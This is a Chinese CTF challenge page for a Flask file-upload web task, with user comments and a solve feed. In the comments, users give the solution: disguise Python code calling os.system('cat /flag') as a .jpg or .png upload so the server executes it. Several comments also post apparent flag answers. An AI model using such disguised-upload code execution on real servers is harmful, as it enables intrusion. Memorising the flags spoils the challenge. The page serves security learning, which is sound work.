Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: ⎝Lazzaro⎠
一血奖励: 3金币
解  决: 11821
提  示:
描  述:
Flask_FileUpload
评论
zhaiwb 2年前

这种题怎么答,我是小白。有入口吗??

回复 2
wxhctf 1年前

@主旋律世界 怎么用命令找呢

回复 0

Cmy520CTF 1年前

@Rookzzh import os os.system('ls ../') os.system('cat ../flag')

回复 0

Rookzzh 1年前

@Cmy520CTF 代码是啥?

回复 0

主旋律世界 1年前

我也是小白,这个路径不可能一眼看出来,可以拿命令找一下,发现在环境变量里面才是用cat /flag

回复 0

Cmy520CTF 2年前

创建一个文本,将代码放进去,改成JPG或者PNG格式,上传文件即可获取flag

回复 2

Cmy520CTF 2年前

import os os.system('ls ../') os.system('cat ../flag')

回复 1

孤独的XK 2年前

flag{5d468b7fbaa83c2a858fbbd4a1241e24}

回复 1

孤独的XK 2年前

flag{5d468b7fbaa83c2a858fbbd4a1241e24}

回复 0

孤独的XK 2年前

flag{5d468b7fbaa83c2a858fbbd4a1241e24}

回复 0

2802867984 2年前

!-- File "/app/upload/1111.jpg", line 1 Python 3.9.7 (tags/v3.9.7:1016ef3, Aug 30 2021, 20:19:38) [MSC v.1929 64 bit (AMD64)] on win32 ^ SyntaxError: invalid syntax --&

回复 0

1019697179 2年前

import os os.system('cat /flag')//导入OS才能使用system,cat是查询命令

回复 1

15091760453 2年前

flag{1c6b553c3a91791993b859e1625275ac}

回复 0

Cat00011cat 2年前

import os os.system('ls / -l') os.system('cat /flag')

回复 2

nf1y 2年前

为啥我返回包出现的是这样 File "/app/upload/test.jpg", line 1 SyntaxError: Non-UTF-8 code starting with '\xff' in file /app/upload/test.jpg on line 1, but no encoding declared; see http://python.org/de

回复 0
不知名学渣 2年前

@aWxvdmVjdGY 我是小白,请问大佬,我很好奇为什么传图片就会以代码形式执行,那么这个实现是类似apache的解析漏洞吗?

回复 0

aWxvdmVjdGY 2年前

1、<input type="file" name="file" accept=".jpg,.png">这里限制了格式,后端也会检查。需要将py文件后缀为png,然后上传会议python文件执行

回复 0

白猫a 2年前

这个作者可以哇,题目解的真精彩!!!

回复 1

WriteUp

image
国家级划水运动员

3 金币

评分(19)

解题动态

zcailss 攻破了该题 2小时前
akid 攻破了该题 3小时前
zxqtd1 攻破了该题 1天前
19966599351 攻破了该题 2天前
3121985758 攻破了该题 2天前
abandon006 攻破了该题 2天前
naomi99 攻破了该题 3天前
cy1393842050 攻破了该题 3天前
Fahai 攻破了该题 4天前
zttyzz 攻破了该题 4天前
16671766779 攻破了该题 4天前
zxingxing121 攻破了该题 5天前
GTfree 攻破了该题 5天前
byx341 攻破了该题 5天前
hzx20060101 攻破了该题 6天前
123456789000000 攻破了该题 7天前
17280870197 攻破了该题 8天前
tushen 攻破了该题 9天前
Tsukisec 攻破了该题 9天前
不知道 攻破了该题 9天前
问题反馈